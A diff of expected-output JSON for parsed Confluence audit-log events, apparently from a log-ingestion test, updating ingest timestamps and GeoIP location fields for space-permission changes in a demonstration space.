 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-08T15:08:08.222622378Z",
+ "ingested": "2021-12-14T14:34:31.513256860Z",
 "original": "{\"timestamp\":\"2021-11-23T00:35:04.296Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -12684,20 +11910,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
 "country_iso_code": "GB",
 "country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
 "location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
 }
 },
 "address": "81.2.69.143",
@@ -12705,7 +11925,7 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-08T15:08:08.222624381Z",
+ "ingested": "2021-12-14T14:34:31.513257257Z",
 "original": "{\"timestamp\":\"2021-11-23T00:35:04.294Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -12779,20 +11999,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
 "country_iso_code": "GB",
 "country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
 "location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
 }
 },
 "address": "81.2.69.143",
@@ -12800,7 +12014,7 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-08T15:08:08.222626278Z",
+ "ingested": "2021-12-14T14:34:31.513257639Z",
 "original": "{\"timestamp\":\"2021-11-23T00:35:04.292Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -12881,20 +12095,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
 "country_iso_code": "GB",
 "country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
 "location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
 }
 },
 "address": "81.2.69.143",
@@ -12902,7 +12110,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222628148Z", + "ingested": "2021-12-14T14:34:31.513258031Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.290Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -12983,20 +12191,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -13004,7 +12206,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222630032Z", + "ingested": "2021-12-14T14:34:31.513258421Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.288Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13078,20 +12280,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -13099,7 +12295,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222631891Z", + "ingested": "2021-12-14T14:34:31.513258818Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.287Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13180,20 +12376,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -13201,7 +12391,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222633767Z", + "ingested": "2021-12-14T14:34:31.513259255Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.285Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13282,20 +12472,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -13303,7 +12487,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222635655Z", + "ingested": "2021-12-14T14:34:31.513259648Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.283Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13377,20 +12561,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -13398,7 +12576,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222637529Z", + "ingested": "2021-12-14T14:34:31.513260036Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.281Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13479,20 +12657,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -13500,7 +12672,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222639402Z", + "ingested": "2021-12-14T14:34:31.513260430Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.279Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13581,20 +12753,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -13602,7 +12768,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222641282Z", + "ingested": "2021-12-14T14:34:31.513260821Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.277Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13676,20 +12842,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -13697,7 +12857,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222643165Z", + "ingested": "2021-12-14T14:34:31.513261213Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.275Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13778,20 +12938,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -13799,7 +12953,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222645040Z", + "ingested": "2021-12-14T14:34:31.513261610Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.273Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13880,20 +13034,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -13901,7 +13049,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222646900Z", + "ingested": "2021-12-14T14:34:31.513262092Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.271Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13975,20 +13123,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -13996,7 +13138,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222648769Z", + "ingested": "2021-12-14T14:34:31.513262489Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.269Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14077,20 +13219,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -14098,7 +13234,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222650644Z", + "ingested": "2021-12-14T14:34:31.513262900Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.267Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14179,20 +13315,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -14200,7 +13330,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222652531Z", + "ingested": "2021-12-14T14:34:31.513263290Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.265Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14274,20 +13404,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - 